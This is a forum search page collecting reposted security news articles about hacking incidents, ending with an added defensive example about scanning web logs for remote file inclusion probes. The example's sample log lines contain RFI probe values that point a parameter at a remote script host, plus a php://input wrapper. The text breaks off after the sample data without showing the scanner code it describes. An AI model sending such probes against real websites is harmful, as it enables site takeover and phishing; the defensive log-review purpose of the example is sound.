Showing results for tags 'hackers'.

More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Site Related
    • News & Updates
    • Site / Forum Feedback
    • Member Introduction
  • News
    • General News
    • FileSharing News
    • Mobile News
    • Software News
    • Security & Privacy News
    • Technology News
  • Downloads
    • nsane.down
  • General Discussions & Support
    • Filesharing Chat
    • Security & Privacy Center
    • Software Chat
    • Mobile Mania
    • Technology Talk
    • Entertainment Exchange
    • Guides & Tutorials
  • Off-Topic Chat
    • The Chat Bar
    • Jokes & Funny Stuff
    • Polling Station

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...

Found 57 results

  1. Hackers Could Use IoT Botnets to Manipulate Energy Markets

     With access to just 50,000 high-wattage smart devices, attackers could make a bundle off of causing minor fluctuations.

     Photograph: George Rose/Getty Images. Caption: Researchers calculated that by running an attack for three hours a day, 100 days a year, market manipulators could take home as much as $24 million per year.

     On a Friday morning in the fall of 2016, the Mirai botnet wreaked havoc on internet infrastructure, causing major website outages across the United States. It was a wake-up call, revealing the true damage that zombie armies of malware-infected gadgets could cause. Now, researchers at the Georgia Institute of Technology are thinking even farther afield about targets that botnets could someday disrupt—such as energy markets. At the Black Hat security conference on Wednesday, the researchers will present their findings, which suggest that high-wattage IoT botnets—made up of power-guzzling devices like air conditioners, car chargers, and smart thermostats—could be deployed strategically to increase demand at certain times in any of the nine private energy markets around the US. A savvy attacker, they say, would be able to stealthily force price fluctuations in the service of profit, chaos, or both. The researchers used real, publicly available data from the New York and California markets between May 2018 and May 2019 to study fluctuations in both the "day-ahead market" that forecasts demand and the "real-time market," in which buyers and sellers correct for forecasting errors and unpredictable events like natural disasters. By modeling how much power various hypothetical high-wattage IoT botnets could draw, and crunching the market data, the researchers devised two types of potential attacks that would alter energy pricing. They also figured out how far hackers would be able to push their attacks without the malicious activity raising red flags.
"Our basic assumption is that we have access to a high-wattage IoT botnet," says Tohid Shekari, a PhD candidate at the Georgia Institute of Technology who contributed to the research, along with fellow PhD candidate Celine Irvine and professor Raheem Beyah. "In our scenarios, attacker one is a market player; he’s basically trying to maximize his own profit. Attacker two is a nation-state actor who can cause financial damage to market players as part of a trade war or cold war. The basic part of either attack is to look at price-load sensitivity. If we change demand by 1 percent, how much is the price going to change as a result of that? You want to optimize the attack to maximize the gain or damage." An attacker could use their botnet's power to increase demand, for instance, when other entities are betting it will be low. Or they could bet that demand will go up at a certain time with certainty that they can make that happen. Unlike regular IoT botnets that are ubiquitous and available for hire on criminal forums, high-wattage botnets are not as practical to amass. None are known to be available for rent by would-be attackers. But over the past couple of years, researchers have begun investigating how they could be weaponized—one example looked at the possibility of mass blackouts—in anticipation that such botnets will someday emerge. Meanwhile, the idea of energy market manipulation in general is not far-fetched. The US Federal Energy Regulatory Commission investigated 16 potential market manipulation cases in 2018, though it closed 14 of them with no action. Additionally, in mid-May, attackers breached the IT systems of Elexon, the platform used to run the United Kingdom's energy market. The attack did not appear to result in market changes. The researchers caution that, based on their analysis, much smaller demand fluctuations than you might expect could affect pricing, and that it would take as few as 50,000 infected devices to pull off an impactful attack. 
In contrast, many current criminal IoT botnets contain millions of bots. Consumers whose devices are unwittingly conscripted into a high-wattage botnet would also be unlikely to notice anything amiss; attackers could intentionally turn on devices to pull power late at night or while people are likely to be out of the house. The idea is to maximize strategic moments that both capitalize on market conditions and help maintain a low profile. The researchers calculated that market manipulation campaigns would cause, at most, a 7 percent increase in consumers' home electric bills, likely low enough to go unnoticed. For hackers, the rewards could be significant. The researchers calculated that by running an attack for three hours per day, 100 days per year, market manipulators could take home as much as $24 million a year. And a determined saboteur could use the same type of attacks to cause as much as $350 million per year in economic damage. It's difficult to know, though, how such attacks would actually play out in practice. For example, the researchers assumed that only one attacker would be attempting to launch botnet-driven market manipulation campaigns at a time in a given region. Multiple actors attempting the same scam in the same place could degrade their returns or make it more likely that they'd get caught. The research also assumes both the existence of high-wattage IoT botnets and that they would be consistent and predictable platforms. Still, the fact that such attacks were relatively easy to conceive and model indicates that they could be crazy enough to work someday. The researchers emphasize that their goal is to promote prevention and defense before that happens. They suggest that high-wattage IoT devices should include some type of real-time monitoring that could flag suspicious use potentially consistent with a malware infection. And they suggest that energy markets revisit how much granular and constantly updating load data they need to release publicly.
Limiting that access wouldn't make it impossible for attackers to get their hands on the data, but it would add a barrier to entry. "It's an example of how the threat landscape changes in unexpected ways," says Beyah, who also cofounded the industrial-control security firm Fortiphyd Logic. "Who would have thought that my washing machine or stationary bike could be the foundation of a completely new type of attack?"

     Source: Hackers Could Use IoT Botnets to Manipulate Energy Markets
  2. Hackers Broke Into Real News Sites to Plant Fake Stories

     A disinfo operation broke into the content management systems of Eastern European media outlets in a campaign to spread misinformation about NATO.

     Photograph: PETRAS MALUKAS/Getty Images. Caption: The propagandists have created and disseminated disinformation since at least March of 2017, with a focus on undermining NATO and the US troops in Poland and the Baltics.

     Over the last few years, online disinformation has taken evolutionary leaps forward, with the Internet Research Agency pumping out artificial outrage on social media and hackers leaking documents—both real and fabricated—to suit their narrative. More recently, Eastern Europe has faced a broad campaign that takes fake news ops to yet another level: hacking legitimate news sites to plant fake stories, then hurriedly amplifying them on social media before they're taken down. On Wednesday, security firm FireEye released a report on a disinformation-focused group it's calling Ghostwriter. The propagandists have created and disseminated disinformation since at least March of 2017, with a focus on undermining NATO and the US troops in Poland and the Baltics; they've posted fake content on everything from social media to pro-Russian news websites. In some cases, FireEye says, Ghostwriter has deployed a bolder tactic: Hacking the content management systems of news websites to post their own stories. They then disseminate their literal fake news with spoofed emails, social media, and even op-eds the propagandists write on other sites that accept user-generated content. That hacking campaign, targeting media sites from Poland to Lithuania, has spread false stories about a US military aggression, NATO soldiers spreading coronavirus, NATO planning a full-on invasion of Belarus, and more.
“They’re spreading these stories that NATO is a danger, that they resent the locals, that they’re infected, that they’re car thieves,” says John Hultquist, director of intelligence at FireEye. “And they’re pushing these stories out with a variety of means, the most interesting of which is hacking local media websites and planting them. These fictional stories are suddenly bona fide by the sites that they’re on, and then they go in and spread the link to the story.” FireEye itself did not conduct incident response analysis on these incidents, and concedes that it doesn't know exactly how the hackers are stealing credentials that give them access to the content management systems that allow posting and altering news stories. Nor does it know who is behind the string of website compromises, or for that matter the larger disinformation campaign that the fake stories are a part of. But the company's analysts have found that the news site compromises and the online accounts used to spread links to those fabricated stories, as well as the more traditional creation of fake news on social media, blogs, and websites with an anti-US and anti-NATO bent, all tie back to a distinct set of personas, indicating one unified disinformation effort. FireEye's Hultquist points out that the campaign doesn't seem financially motivated, indicating a political or state backer, and notes that the focus on driving a wedge between NATO and citizens of Eastern Europe hints at possible Russian involvement. Nor would it be the first time that Russian hackers planted fake news stories; in 2017 US intelligence agencies concluded that Russian hackers breached Qatar's state news agency and planted a fake news story designed to embarrass the country's leader and cause a rift with the US, though US intelligence never confirmed the Kremlin's involvement. "We can’t concretely tie it to Russia at this time, but it’s certainly in line with their interests," Hultquist says of the Ghostwriter campaign. 
"It wouldn’t be a surprise to me if this is where the evidence leads us." Two false stories planted on the Lithuanian news site Kas Vyksta Kaune, one about a planned NATO invasion of Belarus (left) and another about German soldiers desecrating a Jewish cemetery, including a photoshopped image that shows a military vehicle with a German flag. Screenshot: Archive.is via Kas Vyksta Kaune False news stories planted on the Baltics-focused news sites The Baltic Course and The Baltic Times claim a US armored vehicle ran over and killed a Lithuanian child (left) and that the first Covid-19 patient in Lithuania is a U.S. soldier who had previously “visited public places and participated in city events with child and youth participation.”Screenshot: Archive.is via The Baltic Course; The Baltic Times In June of 2018, for instance, the English-language, Baltics-focused news site the Baltic Course published a story claiming that a US Stryker armored vehicle had collided with a Lithuanian child on a bicycle, killing the child "on the spot." The same day, the Baltic Course posted a notice to the site that "hackers posted this news about the deceased child, which is FAKE!!! We thank our vigilant Lithuanian readers who reported on our Facebook page about fake new on site. We strengthened security measures." A few months later, the Lithuanian news site Kas Vyksta Kaune published a story stating that "NATO plans to invade Belarus," showing a map of how NATO forces in Polish and Baltic countries would enter the neighboring country. Kas Vyksta Kaune later acknowledged that the story was fake, and planted by hackers. Someone had used a former employee's credentials to gain access to the CMS. Then in September of last year, another fake story was posted to the site about German NATO soldiers desecrating a Jewish cemetery, including what FireEye describes as a photoshopped image of a military vehicle with a German flag visible behind the cemetery. 
More recently, the fake stories have attempted to exploit fears of Covid-19. One story posted to both Kas Vyksta Kaune and the English-language Baltic Times in January claimed that the first Covid-19 case in Lithuania was a US soldier who was hospitalized in critical condition, but only after he "visited public places and participated in city events with child and youth participation," according to the Baltic Times version of the story. In April and May of this year, the focus turned toward Poland: A fake story was posted across several Polish news sites in which a US official disparaged local Polish forces as disorganized and incompetent. This time the campaign went even beyond news sites. A fake letter from a Polish military official was posted to the Polish Military Academy website, calling on the Polish military to cease military exercises with the US, decrying the US "occupation" of Poland and calling the exercises a "obvious provocation" of Russia. The Polish government quickly called out the letter as fake. FireEye's finding that all of those operations to plant fake news were carried out by a single group comes on the heels of a report from the New York Times that Russia's military intelligence agency, the GRU, has been coordinating the publication of disinformation on sites like InfoRos, OneWorld.press and GlobalResearch.ca. US intelligence officials speaking to the I said that disinformation campaign, which included false reports that Covid-19 originated in the US, was specifically the work of the GRU's "psychological warfare unit," known as Unit 54777. Given the GRU's role in meddling in the 2016 presidential election, including its hack-and-leak operations against the Democratic National Committee and the Clinton Campaign, any GRU role in more recent disinformation raises fears that they may be targeting the 2020 election as well. 
While FireEye has made no such claims that the Ghostwriter news site compromises were the work of the GRU, Hultquist argues that the incidents in Poland and the Baltics should nonetheless serve as a warning. Even if false stories are spotted quickly and taken down, they could have a significant, temporary effect on public opinion, he warns. "My concern is that we could see this sort of compromised media tactic in the West and even during the election. It’s a perfect sort of last-minute tactic," Hultquist says. "Once the genie is out of the bottle, can you get it back in? Can you make enough people understand this is some foreign power that’s pushed this story? It may be too late."

     Source: Hackers Broke Into Real News Sites to Plant Fake Stories
  3. ALERT! Hackers are using coronavirus maps to attack your computer, steal information

     If there weren't enough ways already to loot people's money online, hackers have now started to attack users' computers and steal important information using coronavirus maps. According to Shai Alfasi, a security researcher at Reason Labs, hackers are using these maps to steal information of users including user names, passwords, credit card numbers, and other info stored in your browser. The fraudsters have designed websites related to coronavirus, asking users to download an application that keeps you updated on the outbreak. The application shows you a map of how COVID-19 is spreading. It is used by the hackers to generate a malicious binary file and install it on your computer. Even though the maps are real, they are generated from a different URL from the original source. As of now, only Windows computers have been hit, but Alfasi expects attackers to work on a new version that might affect other systems too. The researcher said that a malicious software known as AZORult is being used for this purpose. The software steals data from your computer and infects it with other malware as well. The software is allegedly used to steal browsing history, cookies, ID/passwords, cryptocurrency and more.

     Coronavirus impact

     The global stock markets suffered historic setbacks on Friday over the coronavirus crisis. The virus has killed nearly 5,000 and infected sport, schools and society across the planet. Japan's stock market fell more than 10 percent on Friday, following the worst day on Wall Street since the crash of 1987 as traders scrambled to sell everything on fears the virus will catapult the world into a deep recession. Meanwhile, Italy has become the second country after China to report over 1000 deaths due to coronavirus. The country has reported 1,016 deaths, adding that at least 15,113 people are infected with the virus. Civil protection officials say 1,258 have recovered, although the number of cases has gone up by 2,651 since Wednesday. Italy is the world's worst-hit country after China.

     Source
  4. Hackers Can Now Send Malware over Bluetooth

     Researchers at ERNW Insinuator, a German security firm, have found a crucial vulnerability that lets attackers run malicious code on some Android devices. The vulnerability CVE-2020-0022 – BlueFrag has now been patched in the latest February 2020 security update. If left unpatched, BlueFrag lets malicious actors steal personal data from your Android phone running Oreo 8.0 and Pie 9.0 without user interaction. The attacker just needs to be in Bluetooth range along with the Bluetooth MAC address of your device to take over your phone. The researchers have not published a technical report detailing the vulnerability so far, as attackers could take advantage of the details. They aim to release the description and proof of concept code of the vulnerability once OEMs push security patches to their devices. You probably need not worry about BlueFrag if your phone is running Android 10. The researchers mention that the exploit does not affect Android 10, as it resulted in a Bluetooth crash when they tested it. The report states that devices running Android versions below Oreo 8.0 could also be affected by the vulnerability and hence, it is recommended to update your smartphone to the latest security patch (if available) to stay safe. With that said, it is worth pointing out that most Android phones running on Android Oreo probably would have reached EOL in terms of software updates and security patches. In that case, your handset would be left vulnerable forever, if brands don’t take an initiative to roll out this patch to all the discontinued devices. If your device has not received the February security patch so far, the security firm recommends switching on Bluetooth only when in use, and keeping your device non-discoverable.

     Source
  5. New Coronavirus Strain? Nope, Just Hackers Trying to Spread Malware

     Photo credit: NurPhoto via Getty. Caption: The hackers have been using files and emails that warn about a new coronavirus strain to trick users into opening them. Doing so can secretly deliver malware to the victim's machine.

     Received a random file about the coronavirus? It's best to avoid opening it. Hackers are starting to exploit fears around the ongoing outbreak to infect computers with malware, according to security researchers. The attacks have been occurring through files and emails that pretend to know something about the coronavirus, but have actually been designed to take over the victim's computer. On Wednesday, the hackers were spotted sending out spam emails to users in Japan, warning about a new strain of coronavirus reaching the island country, according to IBM Security. The emails, which are written in Japanese, urge the recipient to open up the attached Word document to learn more. If macros are enabled, the opened document will be able to execute a series of commands to secretly download the Emotet malware, which can steal sensitive information from your machine or deliver other dangerous payloads, such as ransomware. The email pretends to come from a disability welfare service provider: "This new approach to delivering Emotet may be significantly more successful, due to the wide impact of the coronavirus and the fear of infection surrounding it," IBM Security said in the report. "We expect to see more malicious email traffic based on the coronavirus in the future, as the infection spreads. This will probably include other languages too." On Thursday, the security firm Kaspersky Lab also reported uncovering malicious files disguised as documents about a new strain of coronavirus. To deliver the payload, the hackers were using PDFs, MP4 files and Word documents.
"The file names imply that they contain video instructions on how to protect yourself from the virus, updates on the threat and even virus detection procedures, which is not actually the case," Kaspersky Lab said. In reality, the discovered files contained a range of different malware threats capable of destroying, blocking, modifying and copying data on the victim's machine. "So far we have seen only 10 unique files, but as this sort of activity often happens with popular media topics, we expect that this tendency may grow," said Kaspersky malware analyst Anton Ivanov in a statement. On Friday, the security firm updated the number of detected malicious files to 32.

     Source
  6. Your items aren't safe on public servers.

     If you play Fallout 76 you might want to avoid public servers for a while. According to multiple posts on the game's Reddit forums -- and confirmed by publisher Bethesda -- hackers have attacked public servers and wiped out the inventories of more than a few players. A post from one of the Overseers warns that "Your weapons and armor, and any other inventory items are not safe." It also appears that Bethesda is unable to restore lost items, so if they're gone, they're gone for good. Of course, there's never a good time for a hack like this, but slap bang in the middle of the festive period is arguably the worst. Bethesda says it's actively working on a solution, and is also looking at ways it can compensate affected players. As the hack has only hit PC, it's planning on bringing the PC version of the game offline to release a fix, but whether things get sorted this side of the fast-approaching holiday remains to be seen.

     More At: Bleeding Cool

     Source
  7. But they didn’t cover their tracks

     Recently, The Verge reported on a string of ransomware attacks that have hit cities including Baltimore; Atlanta, Georgia; Newark, New Jersey; and 22 Texas towns. Even The Weather Channel has fallen victim. But before those attacks, there was an attack on the nation’s capital, days before the presidential inauguration. An article from The Wall Street Journal details how hackers Alexandru Isvanca and Eveline Cismaru seized control of Washington, DC’s surveillance cameras right before Trump’s inauguration. The piece is full of twists and turns, from the small-time beginnings of the hackers’ scamming careers to them eventually turning on each other. The story contains a lot of colorful details about the pair. Here are some highlights:

     • The hackers weren’t initially trying to hit DC police cameras. They caught a break after sending out hundreds of thousands of emails containing ransomware to a list of addresses purchased on the dark web — it just so happened that at least one was connected to DC police. In the end, they controlled 126 out of 186 DC police computers, which in turn controlled the surveillance cameras.
     • Isvanca and Cismaru led authorities straight to a smoking gun. Well, at least a barbecuing device called a smoking gun. It turns out the pair used that same hacked DC police computer in a separate Amazon scam Cismaru was running. She ordered a smoking gun, and the tracking number showed up on the police computer, allowing authorities to see and raid the package’s destination.
     • Isvanca didn’t do a great job of covering his tracks either. He ordered pizza using the same email address he used to hack the computers.
     • Cismaru said that hacking into the capital’s surveillance system was easy. “Americans are stupid,” she said in a text to The Wall Street Journal.

     You can read the rest of the fascinating details in the full story here.
Source: Hackers hijacked the capital’s surveillance cameras days before Trump’s inauguration and said it was easy (via The Verge)
  8. Two computer hackers have pleaded guilty to concocting an extortion scheme that entangled Uber in a year-long cover-up of a data breach that stole sensitive information about 57 million of the ride-hailing service's passengers and drivers. The pleas entered in a San Jose, California, federal court by Brandon Charles Glover and Vasile Mereacre resurrected another unseemly episode in Uber's checkered history. Glover, 26, and Mereacre, 23, acknowledged stealing personal information from companies that was stored on Amazon Web Services from October 2016 to January 2017 and then demanding to be paid to destroy the data. Uber met the hackers' demand with a US$100,000 (RM417,000) payment, but waited until November 2017 to reveal that the personal information of both its riders and drivers around the world had fallen into the hands of criminals. US attorney David Anderson ripped into Uber for not immediately alerting authorities about the loss of so much personal information that could have been used for identity theft and other malicious purposes. "Companies like Uber are the caretakers, not the owners, of customers' personal information," Anderson said in a statement. Uber declined to comment on the guilty pleas and Anderson's criticism. The San Francisco company has previously said it mishandled the data breach. By the time Uber came clean about the incident, it had ousted its co-founder, Travis Kalanick, as CEO. Dara Khosrowshahi was then brought in to replace Kalanick and burnish an image that had been tarnished by revelations of rampant sexual harassment within Uber's ranks, attempts to dupe government regulators and accusations of stealing self-driving car technology. As part of their scheme, Glover and Mereacre also tried to blackmail Lynda.com, part of professional networking service LinkedIn, according to authorities. Instead of meeting those demands, LinkedIn tried to identify the extortionists, the government said. 
The two men each face up to five years in prison and a US$250,000 (RM1mil) fine. A status conference about their sentencing has been scheduled before US District Judge Lucy Koh.

     Source: Hackers plead guilty in data breach that Uber covered up (via The Star Online)
  9. Microsoft Corp said it has tracked "significant" cyberattacks coming from a group it calls "Strontium" or "Fancy Bear", targeting anti-doping authorities and global sporting organisations. The group, also called APT28, has been linked to the Russian government, Microsoft said in a blog post. At least 16 national and international sporting and anti-doping organisations across three continents were targeted in the attacks which began on Sept 16, according to the company. The company said some of these attacks had been successful, but the majority had not. Microsoft has notified all customers targeted in these attacks. Strontium, one of the world's oldest cyber espionage groups, has also been called Sofacy and Pawn Storm by a range of security firms and government officials. Security firm CrowdStrike has said the group may be associated with the Russian military intelligence agency GRU. Microsoft said Strontium reportedly released medical records and emails taken from sporting organisations and anti-doping officials in 2016 and 2018, resulting in an indictment in a federal court in the United States in 2018. The software giant added that the methods used in the most recent attacks were similar to those used by Strontium to target governments, militaries, think-tanks, law firms, human rights organisations, financial firms and universities around the world. Strontium's methods include spear-phishing, password spray, exploiting Internet-connected devices and the use of both open-source and custom malware, it added. Microsoft has in the past taken legal steps to prevent Strontium from using fake Microsoft internet domains to execute its attacks. By August last year, Microsoft had shut down 84 fake websites in 12 court-approved actions over the past two years. Microsoft said at the time that hackers linked to Russia's government sought to launch cyber attacks on US political groups.
Source: Microsoft says Russia-linked hackers target sports organisations (via The Star Online)
  10. New batch of 20,000 payment card details found on the dark web and traced back to new Click2Gov hacks.

     Two years after hackers first started targeting local government payment portals, attacks are still going on, with eight cities having had their Click2Gov payment portals compromised in the last month alone, security researchers from Gemini Advisory have revealed in a report shared with ZDNet today. These new hacks have allowed hackers to get their hands on over 20,000 payment card details belonging to US citizens, which are now being traded on the dark web, the cyber-security firm said.

     History of Click2Gov hacks

     Click2Gov is a web-based portal sold by Central Square, formerly known as Superion, to US and Canadian municipalities, small and large alike. It comes as a cloud-based offering and in a self-hosted version. Once up and running, Click2Gov provides a self-service portal where US citizens can pay taxes and bills. Such portals are widespread across the US and are not only used by locals, but also by Americans living across the country to pay bills and taxes for property they own in other cities or states. In 2017, a hacker group began targeting self-hosted Click2Gov portals that had been lagging behind with software patches. According to a FireEye report, this hacker group developed two never-before-seen malware strains named Firealarm and Spotlight, specifically for attacks on Click2Gov portals. The first malware was capable of sifting through Click2Gov logs to identify and steal payment card data, while the second was designed to intercept card data in real-time, from HTTP traffic. During 2017 and 2018, the group is believed to have compromised the Click2Gov portals of at least 46 US cities and stolen up to 300,000 payment card details, according to reports from Risk Based Security [1, 2] and Gemini Advisory. Once sold on carding forums, Gemini Advisory researchers believe the stolen card details netted hackers over $1.7 million in revenue.
New attacks last month

     But after the initial attacks, Central Square (then named Superion) did its due diligence and released security updates to address the various vulnerabilities hackers were using in previous attacks. But in a report shared with ZDNet today, Gemini Advisory said that hackers have continued to breach new Click2Gov portals. The company said it recently discovered a new batch of 20,000 payment card details that it tracked to compromises of Click2Gov portals at eight US cities. All eight were running up-to-date Click2Gov versions, and all hacks took place last month, August 2019. In addition, six cities had also suffered Click2Gov compromises in the first wave of attacks, in 2017 and 2018.

     New victims: Pocatello, ID; Broken Arrow, OK.
     Re-compromised victims: Palm Bay, FL; Deerfield Beach, FL; Milton, FL; Coral Fields, FL; Bakersfield, CA; Ames, IA.

     Currently, Gemini Advisory can't say how the hackers got in. For the six towns that had been compromised in the past, it may be possible that hackers left a hidden backdoor during the first hack, which they used to re-gain access to Click2Gov systems this summer. However, it remains unclear how hackers gained entry to the Click2Gov portals of the two other cities that weren't compromised before. One could point the finger at a new Click2Gov vulnerability, but things aren't that easy. Hackers could have very easily used spear-phishing, password spraying, or credential stuffing attacks to gain access to an administrator's account. Blaming the attacks on a new vulnerability may not be accurate. A Central Square spokesperson did not return a request for comment, seeking more information from the company's side, before this article's publication.

     US cities notified

     "Gemini attempted to reach out to several of these eight towns about the second wave of breaches; while most did not respond, those that did confirm a breach in their Click2Gov utility payment portals," the company said today in its report.
"Certain towns that did not respond to Gemini's outreach have taken their Click2Gov portals offline shortly after we attempted to contact them." Everyone who paid taxes or bills on the Click2Gov self-service portals of the eight aforementioned cities are now advised to review payment card logs and request new cards from their banks. Source
  11. The unprecedented attack on Apple iPhones revealed by Google this week was broader than first thought. Multiple sources with knowledge of the situation said that Google’s own Android operating system and Microsoft Windows PCs were also targeted in a campaign that sought to infect the computers and smartphones of the Uighur ethnic group in China. That community has long been targeted by the Chinese government, in particular in the Xinjiang region, where surveillance is pervasive.

Google’s and Microsoft’s operating systems were targeted via the same websites that launched the iPhone hacks, according to the sources, who spoke on the condition of anonymity. That Android and Windows were targeted is a sign that the hacks were part of a broad, two-year effort that went beyond Apple phones and infected many more than first suspected. One source suggested that the attacks were updated over time for different operating systems as the tech usage of the Uighur community changed.

Android and Windows are still the most widely used operating systems in the world. They both remain hugely attractive targets for hackers, be they government-sponsored or criminal.

Neither Microsoft nor Google had provided comment at the time of publication. It’s unclear if Google knew or disclosed that the sites were also targeting other operating systems. One source familiar with the hacks claimed Google had only seen iOS exploits being served from the sites. Apple has yet to offer any statement on the attacks and hadn’t provided comment on the latest developments.

Google told Apple which sites had been targeted in February, according to one source close to Google, whose researchers revealed the attacks on August 29. But no one has yet named which specific Uighur-interest sites were used to launch malicious code on iPhones. It's unclear exactly what Android and Windows exploits were launched via the websites that were used to launch attacks on Apple's OS.

In the case of the iOS hacks, the exploits placed malware on the phone and could spy on a massive amount of data. That included encrypted WhatsApp, iMessage and Telegram texts, as well as live location.

Sustained surveillance in Xinjiang

The attacks appear to form part of a mass surveillance operation taking place on Uighur civilians, who've faced various forms of persecution in Xinjiang. Surveillance cameras are scattered across the region and facial recognition is prevalent.

"The Chinese government has been systematically targeting the Uighur population for surveillance and imprisonment for years," said Cooper Quintin, senior staff technologist at the Electronic Frontier Foundation. "These attacks likely have the goal of spying on the Uighur population in China, the Uyghur diaspora outside of China and people who sympathize with and might wish to help the Uighur in their struggle for independence."

Quintin told Forbes this appeared to be a "high-risk, high-reward campaign" that was trying to scoop up as much intelligence on possible Uighur sympathizers as possible. One source told TechCrunch, which first reported the Uighur targeting, that it's likely even those who weren't part of the ethnic group were hit.

Source
  12. As the 2020 election looms and legislation to secure voting machines languishes, politicians head to the largest hacking conference in the world for help.

For two years in a row, hackers at Defcon have demonstrated that voting machines currently in use in US elections have serious security issues. With the 2020 US presidential election quickly approaching, lawmakers who want to fix those vulnerabilities are heading to the Las Vegas hacking conference, which starts Thursday, to see them in person.

Many lawmakers have wanted to pass an election security bill since the race for the White House in 2016, when Russian hackers interfered with the election. A Senate Intelligence Committee report released in late July detailed how the hackers likely targeted election systems in all 50 states. In states such as Illinois and Florida, they were successful.

While there's no evidence that any votes were tampered with during the 2016 election, hackers have shown plenty of proof that the voting machines being used are vulnerable to attacks. Lawmakers like Sen. Ron Wyden, a Democrat from Oregon, have proposed legislation to improve election security to make sure these vulnerabilities wouldn't affect future voters.

"White hat hackers do an invaluable public service in this technologic age by identifying security holes and, if necessary, shaming the government or the companies responsible into fixing them," Wyden said in a statement. "The success of the Voting Village -- in which public demonstrations of voting machine flaws by hackers at Defcon quickly convinced officials in Virginia to promptly move to paper-based voting systems -- is a prime example of how the computer security community has positively impacted public policy and protected our national security."

Despite those efforts, Congress hasn't been able to pass an election security bill. Senate Majority Leader Mitch McConnell, a Republican from Kentucky, blocked two election security bills in July, calling it "partisan legislation." This comes after former special counsel Robert Mueller warned Congress last month that Russia would continue its efforts to hack US elections, telling lawmakers, "They're doing it as we sit here."

Along with Wyden, Rep. Eric Swalwell, a Democrat from California, will also be at the Voting Village at the hacker conference. There, hackers and election security experts will have an opportunity to explain to lawmakers what policies are needed to keep voters safe from hackers.

"The overwhelming interest we are seeing from government leaders demonstrates that securing our democracy is a national security priority and we need policy solutions that address the concerns brought to light each year by this Village," Voting Village co-founder Harri Hursti said in a statement.

This is the first year that Defcon has volunteers specifically to help politicians integrate with hackers and learn about issues in cybersecurity. The outreach could potentially affect proposed legislation that would keep cities, elections and devices secure for years to come.

Rep. Ted Lieu, a Democrat from California, and Rep. Jim Langevin, a Democrat from Rhode Island, will also be at the hacking convention to learn how policymakers can affect future legislation on cybersecurity.

"I became one of the first members of Congress to attend Defcon when I spoke two years ago about how security researchers have shaped my work," Langevin said in a statement. "I know firsthand the incredible value and knowledge the Defcon community can offer to policymakers. I'm looking forward to returning to the conference this year to keep the lines of communication open."

A new machine

Lawmakers at the Voting Village will be able to see a prototype of a $10 million DARPA-funded open source voting machine, designed to prevent hackers from tampering with people's votes. The project is headed by Galois, a government contractor to which DARPA awarded the project in March. Since then, Galois has also worked with Microsoft to develop ElectionGuard, software for voting machines to verify ballots.

While in both years that the Voting Village has existed hackers were able to find vulnerabilities, Galois is aiming to bring the first voting machine that hackers at Defcon can't crack. But even if hackers do find vulnerabilities with the prototype, which its creators expect to happen, it's a win-win.

"There's an ambition that this demonstration will not have vulnerabilities comparable to what's in the room," Joe Kiniry, a principal scientist at Galois, said in an interview. "But of course, the point of the exercise is to learn. If they do find flaws, it helps the researchers put on a different thinking cap and adjust their work over the next 2.5 years while this project continues."

Galois's machine reads votes on paper, and verifies that the vote is valid through scans. It'll be equipped with a secure CPU that Galois created, designed to protect against common attacks that other voting machines have fallen to in previous Voting Villages.

Kiniry said the team has been looking at voting machines for nearly two decades, learning from past mistakes. This prototype, he said, goes beyond normal voting machine standards.

"We're building things that aim to have a security profile comparable to the work we do for the Department of Defense and intelligence agencies," Kiniry said. "Showing that we can do that for a voting system, we hope will show the world that it is really possible to raise the bar."

The project is open-source, so that voting machine vendors can adopt the security features for their own devices in future elections. If successful, lawmakers will be able to see this technology as another step for election security legislation.

Source
  13. Crooks fail to hijack infosec bloke's site to dress it up as a legit Euro bank login page

Think you have bad luck? Imagine being the script kiddie who inadvertently tried and failed to pwn an Akamai security pro.

Larry Cashdollar, a senior security response engineer at the US-based global web giant, told us late last week he just recently noticed something peculiar in the logs on his personal website. Further investigation turned up signs of someone scanning for remote file inclusion (RFI) vulnerabilities.

Anyone in charge of public-facing servers will know these boxes come under continuous scanning and probing by miscreants, bots, and security researchers all the time. However, in this particular case, Cashdollar has today helpfully documented his findings as a heads-up, or warning, to website admins and webapp developers. If anything, you should ensure your software is not vulnerable to RFI, otherwise you may well fall to the same fools who tried to pwn the infosec engineer's website.

He told The Register his site's logs showed the would-be attacker probing for RFI holes that would allow them to trick web applications into fetching and running a remote malicious script. In this case, the scumbag was trying, unsuccessfully, to load a file via a custom tool Cashdollar had created for his site.

"Based on my log entries they appear to be parsing web sites looking for form variables and automatically testing if those variables allow remote file inclusion," Cashdollar told El Reg. "It’s a generic test against any website where they can parse out the form input variable and then supply a URL to that variable to see if the content is included and executed."

Unfortunately for the attacker, Cashdollar also used the logs to follow the GET requests to the payload the attacker was trying to load: a script that attempted to harvest information about his server. By dissecting that and other files the hacker had ready to execute commands and take over vulnerable websites, Cashdollar was also able to extract the criminal's email address and their preferred language – Portuguese.

While RFI exploits are usually performed to hijack a web server, in this case Cashdollar believes the attackers were trying something different: using file-injecting holes as a way to transform the site into a base for phishing. The miscreant's arsenal of scripts included commands that would create HTML files on the victim's server that mimicked the site of a popular European bank.

In other words, the attacker was probing for an RFI vulnerability that would allow them to quietly install phishing pages on the host server that masqueraded as a legit bank's login webpage, and then direct victims to those pages to harvest their bank account credentials as they tried to log into the fake.

Source
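As an added, defender-side example (not Cashdollar's or The Register's code), this is the kind of log review the article describes: it parses Apache combined-format access-log lines, flags any query parameter whose value is a remote URL or a stream wrapper (the signature of an RFI probe, percent-encoded or not), tallies probes per source address, and shows the allow-list lookup an application should use instead of building an include path from the parameter. The log lines, hosts, paths and parameter names are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (Apache "combined" format) for this example;
# the hosts, paths and parameter names are made up, not taken from Cashdollar's site.
SAMPLE_LOG = """\
203.0.113.7 - - [26/Aug/2019:10:12:01 +0000] "GET /tool.php?file=http://203.0.113.99/x.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [26/Aug/2019:10:12:02 +0000] "GET /tool.php?file=https%3A%2F%2F203.0.113.99%2Fx.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.4 - - [26/Aug/2019:10:15:44 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [26/Aug/2019:10:12:03 +0000] "GET /contact.php?tpl=php://input HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""

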